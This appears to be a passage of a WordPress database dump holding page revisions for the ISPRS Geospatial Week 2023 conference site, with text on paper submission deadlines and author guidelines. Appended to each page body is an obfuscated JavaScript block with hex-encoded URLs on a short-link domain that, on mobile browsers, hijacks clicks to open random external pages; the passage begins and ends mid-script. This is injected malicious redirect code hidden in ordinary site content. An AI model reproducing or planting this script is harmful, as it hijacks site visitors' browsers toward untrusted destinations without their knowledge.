\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Precision GNSS: Technology Advances and Applications for Navigation and Mapping</strong>','','inherit','closed','closed','','3452-revision-v1','','','2022-12-16 14:16:50','2022-12-16 14:16:50','',3452,'https://gsw2023.com/?p=3490',0,'revision','',0),
(3491,1,'2022-12-16 14:21:05','2022-12-16 14:21:05','<p>[vc_row][vc_column][vc_column_text]</p>\n<h5>The ISPRS Geospatial Week 2023 submission will be opened for paper submission through the ConfTool: Conference Management Software. Authors will be able to submit either a full paper or an extended abstract to one of the following workshops :</h5>\n<p>&nbsp;</p>\n<p>&nbsp;[/vc_column_text][dt_portfolio_slider number=\"24\" order=\"asc\" padding=\"30\" appearance=\"from_bottom\" content_aligment=\"center\" show_title=\"true\" show_link=\"true\" show_details=\"true\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][vc_separator color=\"vista_blue\" style=\"shadow\" border_width=\"10\"][bsf-info-box icon_size=\"32\"]&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<div class=\"three_quarter first\">\n<p style=\"text-align: justify; color: red;\">The papers must be prepared according to the <a href=\"http://www.isprs.org/documents/orangebook/app5.aspx\" target=\"_blank\" rel=\"noopener\"> ISPRS guidelines</a>. Paper reviews will be conducted according to the <a href=\"https://www.isprs-ann-photogramm-remote-sens-spatial-inf-sci.net/IV-5/53/2018/\" target=\"_blank\" rel=\"noopener\">ISPRS reviewing process</a>. Note that Full papers should be submitted anonymously. Please also check that your name is not listed in the document properties of the submitted .pdf and not included in the file name!</p>\n<p style=\"text-align: justify; color: red;\">Full papers accepted after the review process organised by the workshop convenors will be published in the <a href=\"http://www.isprs.org/publications/annals.aspx\" target=\"_blank\" rel=\"noopener\">ISPRS Annals</a>. Authors of accepted extended abstracts (around 1000 words) will be invited to submit their full paper in a later stage for publication in the <a href=\"http://www.isprs.org/publications/archives.aspx\" target=\"_blank\" rel=\"noopener\">ISPRS Archives</a>.</p>\n<div class=\"gap-10\"></div>\n<h3>Paper submissions deadlines</h3>\n<ul class=\"nospace\">\n<li style=\"list-style-type: none;\">\n<ul class=\"nospace\">\n<li><strong>Full paper submission (Annals): March 2023 (hard deadline, no extension)</strong></li>\n<li><strong>Abstract submission (Archives): April 2023 (hard deadline, no extension)</strong></li>\n<li><strong>Abstract author notification: May 2023</strong></li>\n<li><strong>Full paper Author notification: May 2023</strong></li>\n<li><strong>Camera ready paper submission: July 2023</strong></li>\n</ul>\n</li>\n</ul>\n<div class=\"gap-50\"></div>\n<h5 style=\"color: red;\">Useful links:</h5>\n<ul class=\"nospace\">\n<li><a title=\" \" href=\"http://www.isprs.org/documents/orangebook/app5.aspx\" target=\"_blank\" rel=\"noopener\">Guidelines for Authors</a></li>\n<li><a title=\" \" href=\"https://www.isprs-ann-photogramm-remote-sens-spatial-inf-sci.net/IV-5/53/2018/\" target=\"_blank\" rel=\"noopener\">Reviewing process for ISPRS Events</a></li>\n</ul>\n<div id=\"respond\"></div>\n</div>\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SUBMIT','','inherit','closed','closed','','2659-revision-v1','','','2022-12-16 14:21:05','2022-12-16 14:21:05','',2659,'https://gsw2023.com/?p=3491',0,'revision','',0),
(3492,1,'2022-12-16 14:21:44','2022-12-16 14:21:44','<p>[vc_row][vc_column][vc_column_text]</p>\n<h5>The ISPRS Geospatial Week 2023 submission will be opened for paper submission through the ConfTool: Conference Management Software. Authors will be able to submit either a full paper or an extended abstract to one of the following workshops :</h5>\n<p>&nbsp;</p>\n<p>&nbsp;[/vc_column_text][dt_portfolio_slider number=\"25\" order=\"asc\" padding=\"30\" appearance=\"from_bottom\" content_aligment=\"center\" show_title=\"true\" show_link=\"true\" show_details=\"true\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][vc_separator color=\"vista_blue\" style=\"shadow\" border_width=\"10\"][bsf-info-box icon_size=\"32\"]&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<div class=\"three_quarter first\">\n<p style=\"text-align: justify; color: red;\">The papers must be prepared according to the <a href=\"http://www.isprs.org/documents/orangebook/app5.aspx\" target=\"_blank\" rel=\"noopener\"> ISPRS guidelines</a>. Paper reviews will be conducted according to the <a href=\"https://www.isprs-ann-photogramm-remote-sens-spatial-inf-sci.net/IV-5/53/2018/\" target=\"_blank\" rel=\"noopener\">ISPRS reviewing process</a>. Note that Full papers should be submitted anonymously. Please also check that your name is not listed in the document properties of the submitted .pdf and not included in the file name!</p>\n<p style=\"text-align: justify; color: red;\">Full papers accepted after the review process organised by the workshop convenors will be published in the <a href=\"http://www.isprs.org/publications/annals.aspx\" target=\"_blank\" rel=\"noopener\">ISPRS Annals</a>. Authors of accepted extended abstracts (around 1000 words) will be invited to submit their full paper in a later stage for publication in the <a href=\"http://www.isprs.org/publications/archives.aspx\" target=\"_blank\" rel=\"noopener\">ISPRS Archives</a>.</p>\n<div class=\"gap-10\"></div>\n<h3>Paper submissions deadlines</h3>\n<ul class=\"nospace\">\n<li style=\"list-style-type: none;\">\n<ul class=\"nospace\">\n<li><strong>Full paper submission (Annals): March 2023 (hard deadline, no extension)</strong></li>\n<li><strong>Abstract submission (Archives): April 2023 (hard deadline, no extension)</strong></li>\n<li><strong>Abstract author notification: May 2023</strong></li>\n<li><strong>Full paper Author notification: May 2023</strong></li>\n<li><strong>Camera ready paper submission: July 2023</strong></li>\n</ul>\n</li>\n</ul>\n<div class=\"gap-50\"></div>\n<h5 style=\"color: red;\">Useful links:</h5>\n<ul class=\"nospace\">\n<li><a title=\" \" href=\"http://www.isprs.org/documents/orangebook/app5.aspx\" target=\"_blank\" rel=\"noopener\">Guidelines for Authors</a></li>\n<li><a title=\" \" href=\"https://www.isprs-ann-photogramm-remote-sens-spatial-inf-sci.net/IV-5/53/2018/\" target=\"_blank\" rel=\"noopener\">Reviewing process for ISPRS Events</a></li>\n</ul>\n<div id=\"respond\"></div>\n</div>\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=fun